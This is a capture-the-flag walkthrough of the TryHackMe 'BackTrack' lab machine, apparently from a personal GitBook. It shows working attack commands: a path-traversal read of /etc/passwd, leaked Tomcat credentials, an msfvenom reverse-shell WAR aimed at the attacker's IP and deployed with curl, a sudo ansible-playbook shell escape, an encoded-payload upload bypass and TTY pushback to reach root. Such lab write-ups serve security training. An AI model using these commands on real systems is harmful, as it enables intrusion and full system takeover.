# BackTrack (THM)

## Enumeration.

### Open ports.

```
// Some codePORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDzPMYVGNn9fk2sUO4qG8t3GP/3ztCkoIRFTSFwnaHtRTiIe8s3ulwJkAyTZHSmedBOMihmyWyEmA44uxY4kUZEiba8R+c7aWHjTvD04VcKWPgVg1URPWMTHyxUcwKGnoh8n6VwM283+/4f2g2GSj2pVbacoV3xfDo8L4PshyfHK7dEd2qnQv9Yge3p5Aw/1Q7w1eaMZnaoicgzDgjhvqrRcS/DRcp3Lwoz6fGQW2/vFxW7d5aisTslKxRPslTy/Vrgprb7I+D9kdGEFqW/DXDfZLo+4O0woecE6+qSYPbIAjvIao25MTR8xHOFR0sCtyVfehEXYxvJ0fsqBG4yp/y15eDT3MSYevdvhHH1ZLejV66zILbPqUhzFBuMW1U6PKvSNPiQdzlnIRpD8ZQN7KJI8Y6zlHgoh8iu7+PgcUQNixYrX1GhMCYwNGHQlLOLriVRzhScZV3ObH1V8+g8I2sc3WZ54G2XUqZX+pN3ugjN1L5mo8mht1m7ZME+W9if37U=
|   256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJfVuy7uiXVmzWVPtY/BYF+RZF36ZR8rh7wxeZi7yeOdWd06henZf8z5rYfalc0YHr6kE3clVa0jq+pF64w/lso=
|   256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHMk87a1jTdUzEWZNm/XtZKIto5reBlJr75kFdCKXscp
6800/tcp open  http            syn-ack ttl 63 aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
| http-methods:
|_  Supported Methods: OPTIONS
8080/tcp open  http            syn-ack ttl 63 Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.93
8888/tcp open  sun-answerbook? syn-ack ttl 63
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sun, 13 Oct 2024 06:02:10 GMT
|     Connection: close
|     <!doctype html>
|     <html>
|     <!-- {{{ head -->
|     <head>
|     <link rel="icon" href="../favicon.ico" />
|     <meta charset="utf-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <meta name="theme-color" content="#0A8476">
|     <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
|     <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
|     <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
|     <!-- }}} -->
|     <body ng-controller="MainCtrl" ng-cloak>
|     <!-- {{{ Icons -->
|_    <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

#### So we have 22,6800,8080 and 8888.

### Enumerate (6800)

So after some search i could not found anything here will enumerate the rest and maybe came back.

### Enumerate (8080)

This port uses Tomcat and it need login creds to be able to do anything let's move to the last one to see if we have anything there.

### Enumerate (8888)

<figure><img src="/files/3xZkRoQSBkYMvoVguRwp" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Kol5VTvpNHJgCQmdM5qy" alt=""><figcaption><p>So as you can see in the image it seems that there is a path traversal in here also as the image of the machine show</p></figcaption></figure>

So let's try to do some basic path traversal techniques and some fuzzing.\
And indded it was vulnrable to local file inclusion because it trys to open the file without any checking on the user inputs which is a big no no. :hushed:

<https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e>\
You can refer to this link for more information and how the code actuly work.

```bash
url --path-as-is http://backtrack.thm:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:112:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:122:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash
```

So as you can see we are able to exploit it. Lets try to get something useful now.\
After a bit of searching i found the tomcat user.

<figure><img src="/files/R5VXqzPWn7xqOsIkFtr7" alt=""><figcaption></figcaption></figure>

```
Username: tomcat
password: OPx52k53D8OkTZpx4fr
```

## Inital Access.

### Reverse Shell.

After i got the creds i search on how i can use the manager-script role to exploit the system i found that this role mean i can not access the gui managment tool but i can access the end points which is under /manager/text so we all need to do is create reverse shell and upload it to the server. You can refre to the following link great example.

<https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00>

```
To create Reverse Shell i used msfvenom.
msfvenom -p java/shell_reverse_tcp lhost=10.11.96.110 lport=4444 -f war -o pwn.war
```

```
And for uploading it into the server i used curl
curl -v -u tomcat:OPx52k53D8OkTZpx4fr --upload-file pwn.war "http://backtrack.thm:8080/manager/text/deploy?path=/foo&update=true"
```

```
Finally using curl again we can run the code
nc -nlvp 4444 # netcat for sure.
curl http://backtrack.thm:8080/foo
```

<figure><img src="/files/XbsJIFwzHAGo5B1BDA8C" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Q1ZAyv4drs3Aiso5rBvP" alt=""><figcaption><p>We can find the first flag under the directory of tomcat.</p></figcaption></figure>

## Access as Wilbur.

<figure><img src="/files/T07eIGEUQpqSLXywL2VX" alt=""><figcaption></figcaption></figure>

So as you can see first we have sudo privilage as wilbur on ansible-playbook which is a tool to manage automated tasks. So this one is quite simpel but i actuly take so long to figure it :cry:. \
<https://gtfobins.github.io/gtfobins/ansible-playbook/>\
using this source we can figure how we can spawn a shell from a task&#x20;

```
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >> /tmp/file.yml

chmod 777 /tmp/file.yml
```

And After that we can simple run the folowing command&#x20;

```
/tomcat@Backtrack:/opt/test_playbooks$ sudo -u wilbur ansible-playbook /opt/test_playbooks/../../../../../tmp/file.yml
```

<figure><img src="/files/rbEG6tVbnUbxsv8FGyCs" alt=""><figcaption></figcaption></figure>

And after that we simple got shell as wilbur.

## Access as orville

So First we will see a message ot wilbur from orville.

<figure><img src="/files/rc2sdczaz1jjBWaJ1VnT" alt=""><figcaption></figcaption></figure>

And aslo  we have another note which contain ssh creds.

<figure><img src="/files/NUznm3l1XJSeK4RlnWfV" alt=""><figcaption></figcaption></figure>

So let's see what orville talk about.

<figure><img src="/files/PuT1wP0zOiOP7DDZhtEp" alt=""><figcaption></figcaption></figure>

We can see here we have a known http port we have not seen before so lets do some port forwarding using SSH.

<figure><img src="/files/T9TIoHWAkBXoOI946X6r" alt=""><figcaption></figcaption></figure>

And now we can access it from port 80 on our machine.

<figure><img src="/files/v0Con4DeyHVfsfvsrrA0" alt=""><figcaption></figcaption></figure>

After login we see an upload place and the project run php so we maybe able to execute php on the machine.

<figure><img src="/files/ZdJuMP0ZxE70eTjTA0iG" alt=""><figcaption></figcaption></figure>

We can not simple just upload php file so there maybe some way to do that.

Oh man after some time of testing i found that we can upload a file in a such a way fileName.png.php but this will not be executed on the server let's check the apache config to figure out why

```
wilbur@Backtrack:~$ cat /etc/apache2/apache2.conf
```

<figure><img src="/files/Y8mW0gElrZFhgUK1cBzS" alt=""><figcaption></figcaption></figure>

So that's why. So since we have been performing path inclusion so i belive here we need to do the same.\
And some testing i came out to find we can using url encoding.

<figure><img src="/files/O0CymnPeKJwWkP4dvjab" alt=""><figcaption></figcaption></figure>

When we encode ../ multiple times it works.

<figure><img src="/files/ojKpWgiqQhvqKGRSw8rg" alt=""><figcaption></figcaption></figure>

And by doing so we can see this too.

<figure><img src="/files/FnkLBga3p0TuoBtFXuzz" alt=""><figcaption></figcaption></figure>

And here we have it.

<figure><img src="/files/6RZ81lD6GgHpSscGfXOi" alt=""><figcaption></figcaption></figure>

By the way this is the payload i used.

<figure><img src="/files/a74ihAflT7W1GtUogH1O" alt=""><figcaption></figcaption></figure>

And now let's just upload our revser shell.

<figure><img src="/files/CviivYkVIueR1C1ygsE3" alt=""><figcaption></figcaption></figure>

After Open python server with

```
python3 -m http.server 8000
```

<figure><img src="/files/9rfkB9gedHYp5Y9aq9Hj" alt=""><figcaption></figcaption></figure>

And now we know the file is in the machine.

<figure><img src="/files/3zB6JFOA7bUN3zJVSeia" alt=""><figcaption></figcaption></figure>

Let's change permisions and execute.

<figure><img src="/files/GtM2oSj9E0MSIr4Vl5xu" alt=""><figcaption></figcaption></figure>

```
%63%68%6d%6f%64%20%2b%78%20%65%78%70%6c%6f%69%74%2e%73%68
```

Now let's run it.

<figure><img src="/files/UtllFVcPPPVbzJkplZd3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/enDco863cVd4zNyuTcYj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/UD15ALrALg3jnxuiDVSk" alt=""><figcaption></figcaption></figure>

## Access as Root.

To get some stable shell i generate ssh key

<figure><img src="/files/pimXb22rnamAgGIEmdxW" alt=""><figcaption></figcaption></figure>

This will produce orville and orville.pub key copy the content of orville.pub into /home/orville/.ssh/authorized\_keys , and copy the content of the orville into your machine and change its premission to 600 and login with it.

<figure><img src="/files/3HY0Ble1tPuR6CvaQfuu" alt=""><figcaption></figcaption></figure>

### Exploit TTYPushback.

After some search i used pspy64 to see what is going on under the seen and i saw this.

<figure><img src="/files/IoLShSfJxQWSsrb2RUqU" alt=""><figcaption></figcaption></figure>

So basiclly the root user login via ssh and switch user to orville user which then zip some stuff. The problem here is that the root user does not uses -p tag which used so create new TTY so we maybe able to retrive the root session and execute commands.

<https://www.errno.fr/TTYPushback.html>\
This is a great example and how to exploit it.

<figure><img src="/files/jCDMH6qFU6TdIJTxIf1K" alt=""><figcaption></figcaption></figure>

So this is the python code just change the command to add s bit to bash so we can executed as root and move that into the .bashrc which will be automaticlly executed once the root switchs to the other user.

<figure><img src="/files/UT0HDcnKlbY7UlOKiztC" alt=""><figcaption></figcaption></figure>

And after some time we will see this.

<figure><img src="/files/45QsHkzLco1sUNw2cwQo" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/eP8iBSD5pOEEAvBjgc9v" alt=""><figcaption></figcaption></figure>

## Ending

At the end this machine was quite fun and has some new things that i have not seen before :thumbsup:


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pythonic01.gitbook.io/pythonic01/try-hack-me/backtrack-thm.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.